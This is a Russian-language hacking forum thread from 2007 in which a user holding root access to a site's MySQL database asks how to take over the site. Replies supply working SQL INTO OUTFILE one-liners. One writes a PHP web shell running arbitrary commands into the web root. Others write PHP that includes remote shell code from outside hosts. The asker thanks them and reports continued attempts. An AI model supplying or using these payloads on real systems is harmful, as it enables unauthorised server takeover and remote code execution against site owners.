MySQL и root доступ

Discussion in 'Уязвимости' started by Gargulia, 15 Jul 2007.

Thread Status:
Not open for further replies.
  1. Gargulia

    Gargulia Banned

    Joined:
    22 Jun 2007
    Messages:
    7
    Likes Received:
    1
    Reputations:
    -8
    народ есть такая проблемка: имеется root доступ к MySQL... как подмять по себя сайт, r57 кидануть?
    былобы все проще если бы на сервере были скрипты работающие с MySQL, но таковых не нашлось... вот сижу и туплю - че делать?
     
  2. Ni0x

    Ni0x Elder - Старейшина

    Joined:
    27 Aug 2006
    Messages:
    338
    Likes Received:
    157
    Reputations:
    37
    все зависит от твоей цели, если нужен сайт, то залей шелл.
     
    1 person likes this.
  3. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    либо remote connect любым клиентом, гоу ту гугл.. если нет возможности удаленно управлять базой, то нужно залить на сервер какой-нибудь пхп-скрипт, недавно выкладывали РСТшные релизы, там была тулза для локальной работы с дб. ищи на форуме =)
     
  4. Gargulia

    Gargulia Banned

    Joined:
    22 Jun 2007
    Messages:
    7
    Likes Received:
    1
    Reputations:
    -8
    народ вы меня видимо немножко не так поняли...
    У меня уже есть root к базе, я не знаю как залить туда шелл, вот в чем проблема...
    есть какиенибудь мыслишки?
     
  5. Ni0x

    Ni0x Elder - Старейшина

    Joined:
    27 Aug 2006
    Messages:
    338
    Likes Received:
    157
    Reputations:
    37
    используй
     
    #5 Ni0x, 15 Jul 2007
    Last edited: 15 Jul 2007
  6. helat

    helat Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    168
    Likes Received:
    45
    Reputations:
    5
    я понял что ему надо.
    ему надо через бд залить шелл.
    Ты говориш что нет скриптов какие работают с бд.
    такоко не может быть ибо бессмысленно было ставить мускул (ведь это не хостинг (Тк как рута на хостинге врятли можно взять))
    Гдето на форуме писали что через команду мускула льёться шелл.
    поиши что то типа Шелл через бд или в этом роде
     
  7. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    738
    Likes Received:
    270
    Reputations:
    59
    Узнаешь DOCUMENT_ROOT, потом
    select '<?php system($cmd) ?>' from [table] into outfile '[DOCUMENT_ROOT]/shell.php'
    select '<? @include("http://youfuckingsite.ru/shell.txt"); ?>' into outfile '/home/blalblalba/shell.php';
     
  8. helat

    helat Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    168
    Likes Received:
    45
    Reputations:
    5
    SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';

    Вот был пример с пхп ББ
     
  9. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    Это если filepriv включен =)
    и есть права на запись в папку
     
    #9 ENFIX, 15 Jul 2007
    Last edited: 15 Jul 2007
  10. Gargulia

    Gargulia Banned

    Joined:
    22 Jun 2007
    Messages:
    7
    Likes Received:
    1
    Reputations:
    -8
    всем спасибо.... я уже догнал Ni0x доходчиво объяснил....
    а за это: select '<? @include("http://youfuckingsite.ru/shell.txt"); ?>' into outfile '/home/blalblalba/shell.php';

    отдельное спасибо, ато я страдал сначало с маленьким шелом(прямо в запросе SELECT), что б патом тока через него залить r57...
     
  11. Gargulia

    Gargulia Banned

    Joined:
    22 Jun 2007
    Messages:
    7
    Likes Received:
    1
    Reputations:
    -8
    Господа что означает такой ответ:

    Warning: Cannot modify header information - headers already sent by (output started at с:\www\sql\libraries\header_meta_style.inc.php:27) in
    с:\www\sql\libraries\common.lib.php on line 1154

    это в phpMyAdmin...
     
  12. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    он означает раскрытие пути =)
    если серьезно, такая ошибка возникает, когда хедеры передаются как в целевом файле, так и в файле, который подключается с помощью include or require.

    в данном случае - хз ) имхо криво поставили phpmyadmin, если такая ошибка вылетает по дефолту.
     
  13. Gargulia

    Gargulia Banned

    Joined:
    22 Jun 2007
    Messages:
    7
    Likes Received:
    1
    Reputations:
    -8
    блин я уже задолбался.... как еще можно залить шелл имея лишь root к MySQL...? или эту ошибку может как нить можно устранить?
    блин аж абидна - имея рута на мускл сижу сложа руки нихера сделать не могу...
     
Loading...
Thread Status:
Not open for further replies.